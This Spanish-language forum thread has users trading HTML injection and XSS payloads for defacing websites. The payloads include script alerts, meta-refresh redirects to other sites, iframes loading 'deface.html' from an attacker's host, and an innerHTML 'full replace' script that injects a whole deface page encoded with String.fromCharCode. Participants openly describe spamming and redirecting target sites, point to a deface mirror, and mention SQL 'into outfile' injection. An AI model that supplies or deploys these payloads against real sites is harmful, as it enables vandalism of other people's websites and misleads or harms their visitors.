Bueno, tengo una idea que se me pasa por la cabeza, pero hay un problema xD no se cuántos códigos ni cuales son los de las htmli, osea conozco 3 pero sólo me sé 2...
1.- Alerta: <script>alert('Contenido alerta')</script>
2.- Redirección: <META HTTP-EQUIV="refresh" CONTENT="segundos; url=http://www.web.com">
3.- Este no se como se llama pero era algo de document no se qué que cuando lo pones, sale la web en blanco y lo que tu le hayas puesto es lo que sale en la web xD
Necesito:
Todos los que sepáis y sus códigos correspondientes
Gracias de antemano.
No se si te serviran, pero te dejo algunos interesantes
No dejar seleccionar texto
<script language="Javascript">
<!-- Begin
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
// End -->
</script>
Abrir link en una nueva ventana
<a href="http://www.CheNico.com" target="_blank">Pauluk Computación</a>
Abrir una ventana con una imagen, podes manejar las medidas cambiando "Width" y "Height"
<a name="1"></a><A
onclick="window.open('MiFoto.jpg','Estructuras','toolbar=no,location=no,scrollbars=yes,directories=
no,status=no,menubar=no,resizable=no,width=400,height=475');"
href="#1"><b><font face="Verdana" size="2">Ejemplo</font></b></a>
Hacer un IFrame
<IFRAME src="http://mihost/deface.html" width="2000" height="1900" scrolling="auto" frameborder="0">
<IFRAME src="http://mihost/deface.jpg" width="2000" height="1900" scrolling="auto" frameborder="0">
Saludos compañero ;)
Bueno... a estas no le veo mucha utilidad sólo a las de iframes xD recuerda que son para las htmli no para programar una web...
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Bueno... a estas no le veo mucha utilidad sólo a las de iframes xD recuerda que son para las htmli no para programar una web...
Si, lo se. Todo depende de tu imaginacion, yo les puedo ddar mucho uso.
Puedo ir gastando la web de a poco, primero no dejo seleccionar texto, luego la lleno de SPAM y luego la redirecciono.
No me refiero a que lo valla a hacer, pero es lo que se me ocurre :)
No se que uso le ves a poner lo de Abrir link en una ventana nueva xD
C1n0x, tú le ves el uso a cambiar el index, Sthefano, te dá ideas de posibles cosas que puedes hacer, si usas un poco de imaginación puedes llegar hasta poner un outfile, en google aparecen diferentes scripts, lo cuales te pueden servir.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
C1n0x, tú le ves el uso a cambiar el index, Sthefano, te dá ideas de posibles cosas que puedes hacer, si usas un poco de imaginación puedes llegar hasta poner un outfile, en google aparecen diferentes scripts, lo cuales te pueden servir.
Exacto, y ademas, abrir una ventana serviria como SPAM :)
Es solo cuestion de ideas, si no sabes como hacerlo, seguro google tiene la respuesta :P
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
C1n0x, tú le ves el uso a cambiar el index, Sthefano, te dá ideas de posibles cosas que puedes hacer, si usas un poco de imaginación puedes llegar hasta poner un outfile, en google aparecen diferentes scripts, lo cuales te pueden servir.
Exacto, y ademas, abrir una ventana serviria como SPAM :)
Es solo cuestion de ideas, si no sabes como hacerlo, seguro google tiene la respuesta :P
No se que mierda sera poner un outfile pero con html injection se pueden hacer cosas asi http://www.insuconet.cl o http://www.zone-h.com/mirror/id/11231730
No se que mas podria ser, en todo caso es lo que hay, ya no quedan muchas webs que dejen pasar un error tan miserable! en algunos foros tambien se da que los admins activan en uso de HTML para que, por ejemplo, sea mas facil postear videos o weas por el estilo Ej: www.documentingreality.com
Deberias mirarte lo que es un into out file, y más cuando estes en un panel que deje pasar html, o también se puede inyectar desde una SQL, miratelo mind.
Pero a ver, yo no quiero que me digáis nada de eso xDDDDDD a ver... yo quiero que me digáis codes para hacer cosas como estos que ya tengo:
- <script>alert('Contenido')</script>
- <META HTTP-EQUIV="refresh" CONTENT="0.00000001; url=http://rthacker.net">
- <h1>Texto</h1>
- <marquee>Texto</marquee>
- <IFRAME src="http://rthacker.net/foro" width="100000" height="100000" scrolling="auto" frameborder="0">
- <script>document.documentElement.innerHTML="<center><br><br><h1>Texto 1</h1><br><br><br><br><h3>Texto 2</h3><br><br><br><br><h3>Texto 3</h3>";</script> ó <script>document.documentElement.innerHTML="<center><br><br><h1>Texto 1</h1><br><br><br><br><h3>Texto 2</h3><br>";</script>
Me decís más? :$
<head><title>BUG</title></head><body bgcolor="black"><table border="1" bordercolor="green" width="800" height="300"></tr><td height="20"><font size="15" color="red" align="center">XSS & HTML</font></td></tr></tr><td height="20"><font size="15" color="red" align="center">Unexploited</font></td></tr></tr><td height="20"><font size="15" color="red" align="center">Narrow your vars</font></td></tr></table></body>Corrige los fallos.<br>
Lo cogí de xtemp.
Ese no hace mucha gracia ponerlo xd bueno ya veréis la dinámica y me diréis más ê.ê luego veréis jejejejejeje
c1n0x modificalo a tu gusto y todo solucionado.
Eso que dices de que salga blanco se le llama "Full replace", el cual te deja meter varias etiquetas html dentro de tal, pero conseguí una forma de defacear mediante full replace, con tu index y todo. Cojes la index, vas a http://jdstiles.com/java/cct.html traduces tu index a charcode, y la metes en este codigo:
<script> document.documentElement.innerHTML=(String.fromCharCode(Aquí tu index traducida a charcode)); </script>
Y buala!! Verás tu index tal y como es, para mi el mejor método a la hora de inyectar html :P
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Eso que dices de que salga blanco se le llama "Full replace", el cual te deja meter varias etiquetas html dentro de tal, pero conseguí una forma de defacear mediante full replace, con tu index y todo. Cojes la index, vas a http://jdstiles.com/java/cct.html traduces tu index a charcode, y la metes en este codigo:
<script> document.documentElement.innerHTML=(String.fromCharCode(Aquí tu index traducida a charcode)); </script>
Y buala!! Verás tu index tal y como es, para mi el mejor método a la hora de inyectar html :P
1º estás reviviendo un post de agosto del 2010.
2º no se que ganas tienen de ponerle nombre a códigos de javascript, nunca lo entendí, para mi siguen siendo cosas que puedes hacer con js, por lo que no puedo entender por que le llaman HTMLi y le ponen nombre a cada inyección.
habría que cerrar el post por revivir xD.
saludos!